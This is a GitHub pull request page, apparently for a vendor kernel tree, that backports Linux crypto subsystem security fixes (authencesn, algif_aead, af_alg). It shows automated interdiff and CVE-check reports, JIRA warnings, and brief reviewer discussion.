 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -233,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -296,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit 2ebd3230218c (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -224,7 +224,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -212,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

JIRA PR Check Results

7 commit(s) with issues found:

Commit 2ebd3230218c

Summary: crypto: algif_aead - snapshot IV for async AEAD requests

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 47a3951a0929

Summary: crypto: algif_aead - Fix minimum RX size check for decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 128b49565240

Summary: crypto: authencesn - reject short ahash digests during instance creation

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit f50e3313629b

Summary: crypto: authencesn - Fix src offset when decrypting in-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 18b86ddf564d

Summary: crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit c476c6e98ec6

Summary: crypto: algif_aead - Revert to operating out-of-place

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Commit 6f82c321961b

Summary: crypto: af-alg - fix NULL pointer dereference in scatterwalk

⚠️ Warnings:

  • VULN-181877: No time logged - please log time manually

Summary: Checked 10 commit(s) total.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

Validation checks completed successfully View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25199816085

roxanan1996
roxanan1996 previously approved these changes May 1, 2026
@bmastbergen

Copy link
Copy Markdown
Collaborator

The extra commit - looks weird here. Unfortunately we missed this in the 9.6 version

crypto: authencesn - reject short ahash digests during instance creation
jira VULN-181877
cve-bf https://github.com/advisories/GHSA-2274-3hgr-wxv6
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9847717329f12c5ea8aba7e9f588a980c0
commit-source centos-stream-9, cryptodev
upstream-diff |
	Diff got placed oddly but was contextual differences.

@PlaidCat

PlaidCat commented May 1, 2026

Copy link
Copy Markdown
Collaborator Author

The extra commit - looks weird here. Unfortunately we missed this in the 9.6 version

crypto: authencesn - reject short ahash digests during instance creation
jira VULN-181877
cve-bf https://github.com/advisories/GHSA-2274-3hgr-wxv6
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9847717329f12c5ea8aba7e9f588a980c0
commit-source centos-stream-9, cryptodev
upstream-diff |
	Diff got placed oddly but was contextual differences.

Its weird because the commit is from the cyptodev not upstream. I was scrambling to figure out how to do this in the middle of the "get the first" out.

@bmastbergen

Copy link
Copy Markdown
Collaborator

The extra commit - looks weird here. Unfortunately we missed this in the 9.6 version

crypto: authencesn - reject short ahash digests during instance creation
jira VULN-181877
cve-bf https://github.com/advisories/GHSA-2274-3hgr-wxv6
commit-author Yucheng Lu <kanolyc@gmail.com>
commit -
commit-source-sha 5db6ef9847717329f12c5ea8aba7e9f588a980c0
commit-source centos-stream-9, cryptodev
upstream-diff |
	Diff got placed oddly but was contextual differences.

Its weird because the commit is from the cyptodev not upstream. I was scrambling to figure out how to do this in the middle of the "get the first" out.

Oh I see. It looks weird because its weird.

bmastbergen
bmastbergen previously approved these changes May 1, 2026

@bmastbergen bmastbergen left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🥌

Comment thread crypto/authencesn.c Outdated
@PlaidCat PlaidCat dismissed stale reviews from bmastbergen and roxanan1996 via 3e104a4 May 1, 2026 18:50
@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🤖 Validation Checks In Progress Workflow run: https://github.com/ctrliq/kernel-src-tree/actions/runs/25228484514

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Upstream Linux Kernel Commit Check

  • ⚠️ PR commit 6f82c321961b (crypto: af-alg - fix NULL pointer dereference in scatterwalk) does not reference a CVE but
    upstream commit 62397b493e14 is associated with CVE-2026-43043

  • ❌ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) references CVE-2026-31431 but
    upstream commit e02494114ebf is associated with CVE-2026-43033

This is an automated message from the kernel commit checker workflow.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

🔍 Interdiff Analysis

  • ⚠️ PR commit c476c6e98ec6 (crypto: algif_aead - Revert to operating out-of-place) → upstream a664bf3d603d
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -526,10 +526,12 @@
 /**
  * aead_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes.
+ * The counting starts from the beginning of the SGL to @bytes. If
+ * an offset is provided, the counting of the SG entries starts at the offset.
  *
  * @sk socket of connection to user space
  * @bytes Count the number of SG entries holding given number of bytes.
+ * @offset Start the counting of SG entries from the given offset.
  * @return Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes)
@@ -563,12 +565,16 @@
  * aead_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to dst. The caller must release
- * the pages.
+ * the pages. If @dst_offset is given only reassign the pages to @dst starting
+ * at the @dst_offset (byte). The caller must ensure that @dst is large
+ * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
  * @sk socket of connection to user space
  * @used Number of bytes to pull from TX SGL
  * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	caller must release the buffers in dst.
+ * @dst_offset Reassign the TX SGL from given offset. All buffers before
+ *	       reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst)
 {
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -211,13 +212,72 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sg;
 
-	err = crypto_aead_copy_sgl(null_tfm, tsgl_src, rsgl_src,
-				   ctx->aead_assoclen);
-	if (err)
-		goto free;
+	if (ctx->enc) {
+		/*
+		 * Encryption operation - The in-place cipher operation is
+		 * achieved by the following operation:
+		 *
+		 * TX SGL: AAD || PT
+		 *	    |	   |
+		 *	    | copy |
+		 *	    v	   v
+		 * RX SGL: AAD || PT || Tag
+		 */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, processed);
+		if (err)
+			goto free;
+		af_alg_pull_tsgl(sk, processed, NULL, 0);
+	} else {
+		/*
+		 * Decryption operation - To achieve an in-place cipher
+		 * operation, the following  SGL structure is used:
+		 *
+		 * TX SGL: AAD || CT || Tag
+		 *	    |	   |	 ^
+		 *	    | copy |	 | Create SGL link.
+		 *	    v	   v	 |
+		 * RX SGL: AAD || CT ----+
+		 */
+
+		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
+					   areq->first_rsgl.sgl.sg, outlen);
+		if (err)
+			goto free;
+
+		/* Create TX SGL for tag and chain it to RX SGL. */
+		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
+						       processed - as);
+		if (!areq->tsgl_entries)
+			areq->tsgl_entries = 1;
+		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
+							 areq->tsgl_entries),
+					  GFP_KERNEL);
+		if (!areq->tsgl) {
+			err = -ENOMEM;
+			goto free;
+		}
+		sg_init_table(areq->tsgl, areq->tsgl_entries);
+
+		/* Release TX SGL, except for tag data and reassign tag data. */
+		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
+
+		/* chain the areq TX SGL holding the tag with RX SGL */
+		if (usedpages) {
+			/* RX SGL present */
+			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+
+			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
+			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
+				 areq->tsgl);
+		} else
+			/* no RX SGL present (e.g. authentication only) */
+			rsgl_src = areq->tsgl;
+	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
 			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -637,8 +637,7 @@
 /**
  * af_alg_count_tsgl - Count number of TX SG entries
  *
- * The counting starts from the beginning of the SGL to @bytes. If
- * an @offset is provided, the counting of the SG entries starts at the @offset.
+ * The counting starts from the beginning of the SGL to @bytes.
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
@@ -642,7 +641,6 @@
  *
  * @sk: socket of connection to user space
  * @bytes: Count the number of SG entries holding given number of bytes.
- * @offset: Start the counting of SG entries from the given offset.
  * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
@@ -676,9 +660,7 @@
  * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
  * If @dst is non-null, reassign the pages to @dst. The caller must release
- * the pages. If @dst_offset is given only reassign the pages to @dst starting
- * at the @dst_offset (byte). The caller must ensure that @dst is large
- * enough (e.g. by using af_alg_count_tsgl with the same offset).
+ * the pages.
  *
  * @sk: socket of connection to user space
  * @used: Number of bytes to pull from TX SGL
@@ -682,8 +664,6 @@
  * @used: Number of bytes to pull from TX SGL
  * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
  *	 caller must release the buffers in dst.
- * @dst_offset: Reassign the TX SGL from given offset. All buffers before
- *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -26,7 +26,6 @@
 #include <crypto/internal/aead.h>
 #include <crypto/scatterwalk.h>
 #include <crypto/if_alg.h>
-#include <crypto/skcipher.h>
 #include <linux/init.h>
 #include <linux/list.h>
 #include <linux/kernel.h>
@@ -72,7 +71,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct af_alg_ctx *ctx = ask->private;
 	struct crypto_aead *tfm = pask->private;
-	unsigned int i, as = crypto_aead_authsize(tfm);
+	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -182,64 +177,7 @@
 	/* Use the RX SGL as source (and destination) for crypto op. */
 	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
-	if (ctx->enc) {
-		/*
-		 * Encryption operation - The in-place cipher operation is
-		 * achieved by the following operation:
-		 *
-		 * TX SGL: AAD || PT
-		 *	    |	   |
-		 *	    | copy |
-		 *	    v	   v
-		 * RX SGL: AAD || PT || Tag
-		 */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
-			      processed);
-		af_alg_pull_tsgl(sk, processed, NULL, 0);
-	} else {
-		/*
-		 * Decryption operation - To achieve an in-place cipher
-		 * operation, the following  SGL structure is used:
-		 *
-		 * TX SGL: AAD || CT || Tag
-		 *	    |	   |	 ^
-		 *	    | copy |	 | Create SGL link.
-		 *	    v	   v	 |
-		 * RX SGL: AAD || CT ----+
-		 */
-
-		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
-
-		/* Create TX SGL for tag and chain it to RX SGL. */
-		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
-						       processed - as);
-		if (!areq->tsgl_entries)
-			areq->tsgl_entries = 1;
-		areq->tsgl = sock_kmalloc(sk, array_size(sizeof(*areq->tsgl),
-							 areq->tsgl_entries),
-					  GFP_KERNEL);
-		if (!areq->tsgl) {
-			err = -ENOMEM;
-			goto free;
-		}
-		sg_init_table(areq->tsgl, areq->tsgl_entries);
-
-		/* Release TX SGL, except for tag data and reassign tag data. */
-		af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
-
-		/* chain the areq TX SGL holding the tag with RX SGL */
-		if (usedpages) {
-			/* RX SGL present */
-			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
-			struct scatterlist *sg = sgl_prev->sgt.sgl;
-
-			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
-			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
-		} else
-			/* no RX SGL present (e.g. authentication only) */
-			rsgl_src = areq->tsgl;
-	}
+	memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
@@ -242,7 +180,7 @@
 	}
 
 	/* Initialize the crypto operation */
-	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
 			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -230,9 +230,8 @@
 	return PAGE_SIZE <= af_alg_rcvbuf(sk);
 }
 
-unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
-void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
-		      size_t dst_offset);
+unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes);
+void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst);
 void af_alg_wmem_wakeup(struct sock *sk);
 int af_alg_wait_for_data(struct sock *sk, unsigned flags, unsigned min);
 int af_alg_sendmsg(struct socket *sock, struct msghdr *msg, size_t size,

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/af_alg.c
+++ b/crypto/af_alg.c
@@ -523,15 +523,15 @@
 /**
- * aead_count_tsgl - Count number of TX SG entries
+ * af_alg_count_tsgl - Count number of TX SG entries
  *
  * The counting starts from the beginning of the SGL to @bytes. If
- * an offset is provided, the counting of the SG entries starts at the offset.
+ * an @offset is provided, the counting of the SG entries starts at the @offset.
  *
- * @sk socket of connection to user space
- * @bytes Count the number of SG entries holding given number of bytes.
- * @offset Start the counting of SG entries from the given offset.
- * @return Number of TX SG entries found given the constraints
+ * @sk: socket of connection to user space
+ * @bytes: Count the number of SG entries holding given number of bytes.
+ * @offset: Start the counting of SG entries from the given offset.
+ * Return: Number of TX SG entries found given the constraints
  */
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset)
 {
-	struct alg_sock *ask = alg_sk(sk);
-	struct af_alg_ctx *ctx = ask->private;
+	const struct alg_sock *ask = alg_sk(sk);
+	const struct af_alg_ctx *ctx = ask->private;
@@ -546,4 +657,4 @@
-		struct scatterlist *sg = sgl->sg;
+		const struct scatterlist *sg = sgl->sg;
 
 		for (i = 0; i < sgl->cur; i++) {
 			size_t bytes_count;
@@ -571,16 +682,16 @@
- * aead_pull_tsgl - Release the specified buffers from TX SGL
+ * af_alg_pull_tsgl - Release the specified buffers from TX SGL
  *
- * If @dst is non-null, reassign the pages to dst. The caller must release
+ * If @dst is non-null, reassign the pages to @dst. The caller must release
  * the pages. If @dst_offset is given only reassign the pages to @dst starting
  * at the @dst_offset (byte). The caller must ensure that @dst is large
  * enough (e.g. by using af_alg_count_tsgl with the same offset).
  *
- * @sk socket of connection to user space
- * @used Number of bytes to pull from TX SGL
- * @dst If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
- *	caller must release the buffers in dst.
- * @dst_offset Reassign the TX SGL from given offset. All buffers before
- *	       reaching the offset is released.
+ * @sk: socket of connection to user space
+ * @used: Number of bytes to pull from TX SGL
+ * @dst: If non-NULL, buffer is reassigned to dst SGL instead of releasing. The
+ *	 caller must release the buffers in dst.
+ * @dst_offset: Reassign the TX SGL from given offset. All buffers before
+ *	        reaching the offset is released.
  */
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset)
--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -25,5 +25,4 @@
 #include <crypto/if_alg.h>
 #include <crypto/skcipher.h>
-#include <crypto/null.h>
 #include <linux/init.h>
 #include <linux/list.h>
@@ -73,6 +69,6 @@
-	struct aead_tfm *aeadc = pask->private;
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_skcipher *null_tfm = aeadc->null_tfm;
+	struct alg_sock *pask = alg_sk(psk);
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int i, as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct af_alg_tsgl *tsgl, *tmp;
@@ -214,7 +184,7 @@
 	 */
 
 	/* Use the RX SGL as source (and destination) for crypto op. */
-	rsgl_src = areq->first_rsgl.sgl.sg;
+	rsgl_src = areq->first_rsgl.sgl.sgt.sgl;
 
 	if (ctx->enc) {
 		/*
@@ -227,10 +197,8 @@
 		 *	    v	   v
 		 * RX SGL: AAD || PT || Tag
 		 */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, processed);
-		if (err)
-			goto free;
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src,
+			      processed);
 		af_alg_pull_tsgl(sk, processed, NULL, 0);
 	} else {
 		/*
@@ -244,11 +212,8 @@
 		 * RX SGL: AAD || CT ----+
 		 */
 
-		 /* Copy AAD || CT to RX SGL buffer for in-place operation. */
-		err = crypto_aead_copy_sgl(null_tfm, tsgl_src,
-					   areq->first_rsgl.sgl.sg, outlen);
-		if (err)
-			goto free;
+		/* Copy AAD || CT to RX SGL buffer for in-place operation. */
+		memcpy_sglist(areq->first_rsgl.sgl.sgt.sgl, tsgl_src, outlen);
 
 		/* Create TX SGL for tag and chain it to RX SGL. */
 		areq->tsgl_entries = af_alg_count_tsgl(sk, processed,
@@ -271,10 +236,10 @@
 		if (usedpages) {
 			/* RX SGL present */
 			struct af_alg_sgl *sgl_prev = &areq->last_rsgl->sgl;
+			struct scatterlist *sg = sgl_prev->sgt.sgl;
 
-			sg_unmark_end(sgl_prev->sg + sgl_prev->npages - 1);
-			sg_chain(sgl_prev->sg, sgl_prev->npages + 1,
-				 areq->tsgl);
+			sg_unmark_end(sg + sgl_prev->sgt.nents - 1);
+			sg_chain(sg, sgl_prev->sgt.nents + 1, areq->tsgl);
 		} else
 			/* no RX SGL present (e.g. authentication only) */
 			rsgl_src = areq->tsgl;
@@ -283,5 +248,5 @@
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
@@ -482,4 +447,4 @@
-	struct crypto_aead *tfm = aeadc->aead;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int ivlen = crypto_aead_ivsize(tfm);
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -319,7 +360,7 @@
 	struct alg_sock *pask = alg_sk(psk);
 	struct crypto_skcipher *tfm = pask->private;
 
 	af_alg_pull_tsgl(sk, ctx->used, NULL, 0);
 	sock_kzfree_s(sk, ctx->iv, crypto_skcipher_ivsize(tfm));
-	sock_kfree_s(sk, ctx, ctx->len);
-	af_alg_release_parent(sk);
+	if (ctx->state)
+		sock_kzfree_s(sk, ctx->state, crypto_skcipher_statesize(tfm));
--- b/include/crypto/if_alg.h
+++ b/include/crypto/if_alg.h
@@ -228,8 +229,5 @@
 
-int af_alg_alloc_tsgl(struct sock *sk);
 unsigned int af_alg_count_tsgl(struct sock *sk, size_t bytes, size_t offset);
 void af_alg_pull_tsgl(struct sock *sk, size_t used, struct scatterlist *dst,
 		      size_t dst_offset);
-void af_alg_free_areq_sgls(struct af_alg_async_req *areq);
-int af_alg_wait_for_wmem(struct sock *sk, unsigned int flags);
 void af_alg_wmem_wakeup(struct sock *sk);
  • ⚠️ PR commit 547910e4c6ed (crypto: af_alg - limit RX SG extraction by receive buffer budget) → upstream 8eceab19eba9
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -90,14 +90,8 @@
 	 * If more buffers are to be expected to be processed, process only
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used) {
-		if (len < bs) {
-			err = -EINVAL;
-			goto free;
-		}
-
+	if (ctx->more || len < ctx->used)
 		len -= len % bs;
-	}
 
 	/*
 	 * Create a per request TX SGL for this request which tracks the

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -130,6 +130,11 @@
 	 * full block size buffers.
 	 */
 	if (ctx->more || len < ctx->used) {
+		if (len < bs) {
+			err = -EINVAL;
+			goto free;
+		}
+
 		len -= len % bs;
 		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
 	}

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_skcipher.c
+++ b/crypto/algif_skcipher.c
@@ -87,7 +87,6 @@
 	 * full block size buffers.
 	 */
-	if (ctx->more || len < ctx->used)
+	if (ctx->more || len < ctx->used) {
 		len -= len % bs;
-
-	/*
-	 * Create a per request TX SGL for this request which tracks the
+		cflags |= CRYPTO_SKCIPHER_REQ_NOTFINAL;
+	}
  • ⚠️ PR commit 15531398a6d3 (crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec) → upstream 2397e9264676
    Differences found:
================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -290,6 +253,6 @@
 	u32 tmp[2];
 	int err;
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
+	if (req->src != dst)
  • ⚠️ PR commit 18b86ddf564d (crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption) → upstream e02494114ebf
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -179,10 +179,7 @@
 	authenc_esn_request_complete(areq, err);
 }
 
-static int crypto_authenc_esn_copy_sg(struct aead_request *req,
-				      struct scatterlist *src,
-				      struct scatterlist *dst,
-				      unsigned int len)
+static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
 	struct crypto_authenc_esn_ctx *ctx = crypto_aead_ctx(authenc_esn);
@@ -191,16 +188,11 @@
 	skcipher_request_set_tfm(skreq, ctx->null);
 	skcipher_request_set_callback(skreq, aead_request_flags(req),
 				      NULL, NULL);
-	skcipher_request_set_crypt(skreq, src, dst, len, NULL);
+	skcipher_request_set_crypt(skreq, req->src, req->dst, len, NULL);
 
 	return crypto_skcipher_encrypt(skreq);
 }
 
-static int crypto_authenc_esn_copy(struct aead_request *req, unsigned int len)
-{
-	return crypto_authenc_esn_copy_sg(req, req->src, req->dst, len);
-}
-
 static int crypto_authenc_esn_encrypt(struct aead_request *req)
 {
 	struct crypto_aead *authenc_esn = crypto_aead_reqtfm(req);
@@ -260,7 +252,6 @@
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-	int err;
 
 	if (!authsize)
 		goto decrypt;
@@ -270,11 +261,8 @@
 		scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
 		scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
 		scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
-	} else {
-		err = crypto_authenc_esn_copy(req, assoclen);
-		if (err)
-			return err;
-	}
+	} else
+		memcpy_sglist(dst, src, assoclen);
 
 	if (crypto_memneq(ihash, ohash, authsize))
 		return -EBADMSG;
@@ -323,8 +311,13 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	if (!authsize)
-		goto tail;
+	cryptlen -= authsize;
+
+	if (req->src != dst) {
+		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
+		if (err)
+			return err;
+	}
 
 	cryptlen -= authsize;
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
@@ -342,10 +335,7 @@
 
 		src = scatterwalk_ffwd(areq_ctx->src, src, 8);
 		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
-		err = crypto_authenc_esn_copy_sg(req, src, dst,
-						 assoclen + cryptlen - 8);
-		if (err)
-			return err;
+		memcpy_sglist(dst, src, assoclen + cryptlen - 8);
 		dst = req->dst;
 	}
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -268,10 +274,8 @@
 	if (assoclen < 8)
 		return -EINVAL;
 
-	cryptlen -= authsize;
-
-	if (req->src != dst)
-		memcpy_sglist(dst, req->src, assoclen + cryptlen);
+	if (!authsize)
+		goto tail;
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/authencesn.c
+++ b/crypto/authencesn.c
@@ -233,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
